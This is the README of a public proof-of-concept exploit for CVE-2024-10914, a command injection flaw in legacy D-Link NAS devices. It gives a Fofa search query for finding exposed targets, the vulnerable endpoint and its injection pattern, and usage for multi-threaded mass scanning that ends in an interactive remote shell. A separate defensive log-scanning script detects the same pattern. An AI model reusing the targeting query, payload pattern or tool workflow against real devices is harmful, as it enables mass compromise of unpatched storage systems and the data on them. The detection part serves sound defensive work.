CVE-2024-10914 is a critical command injection vulnerability affecting several legacy D-Link Network Attached Storage (NAS) devices.

CVE-2024-10914 - D-Link Remote Code Execution (RCE) Exploit

This script is a proof-of-concept (PoC) exploit for CVE-2024-10914, a remote code execution vulnerability in certain D-Link devices. The script identifies and exploits vulnerable devices to execute arbitrary commands.

Note: This script should only be used for educational purposes or in authorized environments. Unauthorized exploitation of this vulnerability may be illegal and unethical.


Finding Targets

To find potential targets, use Fofa (similar to Shodan.io):

Fofa Dork: app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

Features

  • Vulnerability Check: The script can check if a target is vulnerable to CVE-2024-10914.
  • Exploit: Exploit the vulnerability by sending payloads to gain remote command execution.
  • Interactive Shell: After exploitation, an interactive shell is started for executing further commands.
  • Multi-target Scanning: Scan multiple targets from a file using multiple threads for faster vulnerability detection.

Requirements

  • Python 3.x
  • requests (for HTTP requests)
  • alive-progress (for progress bars)
  • prompt_toolkit (for the interactive shell)
  • argparse (for handling command-line arguments)

To install required libraries, use:

pip3 install -r requirements.txt

Command-Line Arguments

usage: exploit.py [-h] [-u URL] [-f FILE] [-t THREADS] [-p PORT]

A PoC exploit for CVE-2024-10914 - D-Link Remote Code Execution (RCE)

optional arguments:
  -h, --help            Show this help message and exit
  -u URL, --url URL     Single target IP to test (e.g., 192.168.1.1)
  -f FILE, --file FILE  File containing list of target IPs to scan
  -t THREADS, --threads THREADS
                        Number of threads to use for scanning (default: 5)
  -p PORT, --port PORT  Port to target (default: 80)

Example Usage

  • Check a Single Target:
    python exploit.py -u 192.168.1.100 -p 80

  • Scan Multiple Targets from a File:
    python exploit.py -f targets.txt -p 80 -t 10

Exploit Details

This script attempts to exploit a vulnerability in D-Link devices, specifically targeting the following:

  • Vulnerable Endpoint: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';{};'
  • Payloads: Various system commands (id, uname -a, hostname, cat /proc/cpuinfo, etc.)

The exploit is carried out by injecting system commands into the vulnerable endpoint, triggering the remote execution of arbitrary commands on the target device.
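For defenders, requests of the shape described above can be spotted in web server access logs. The following is an added example, not part of this repository's code: it flags requests to account_mgr.cgi with cmd=cgi_user_add whose decoded name value contains shell metacharacters. The log format (Common/Combined Log Format), the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Characters that let a parameter value break out of a shell command line.
SHELL_META = re.compile(r"""[;'"`|&$<>(){}\\\n\r]""")
# Assumption: Common/Combined Log Format access log lines.
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Nov/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 1024
192.0.2.10 - - [12/Nov/2024:10:00:05 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=alice HTTP/1.1" 200 512
198.51.100.7 - - [12/Nov/2024:10:02:11 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bid%3B%27 HTTP/1.1" 200 98
203.0.113.5 - - [12/Nov/2024:10:03:40 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';hostname;' HTTP/1.1" 200 120
""".splitlines()

def query_params(query):
    """Split on '&' only: a ';' inside a value is exactly what we look for."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def suspicious_name(target):
    """Return the decoded name value if it carries shell metacharacters."""
    parts = urlsplit(target)
    if not parts.path.endswith("/cgi-bin/account_mgr.cgi"):
        return None
    params = query_params(parts.query)
    if "cgi_user_add" not in params.get("cmd", []):
        return None
    for name in params.get("name", []):
        if SHELL_META.search(name):
            return name
    return None

def scan(lines):
    """Return (source address, decoded name) for each suspicious request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if match:
            name = suspicious_name(match.group("target"))
            if name is not None:
                hits.append((match.group("src"), name))
    return hits

if __name__ == "__main__":
    for src, name in scan(SAMPLE_LOG):
        print(f"{src} sent name={name!r} to account_mgr.cgi")
```

Access logs record only the request line, so this check sees parameters carried in the query string, as in the endpoint shown above.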

Disclaimer

This script is for educational purposes only. Do not use this script on systems or networks you do not have explicit permission to test.

The authors are not responsible for any misuse of this tool.

For more details, please refer to the official GitHub repository: https://github.com/ThemeHackers/CVE-2024-10914

Contributing

If you find any issues or want to contribute, feel free to open an issue or submit a pull request on the GitHub repository.

License

This project is licensed under the MIT License - see the LICENSE file for details.

MIT License

Copyright (c) 2024 ds_zct

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
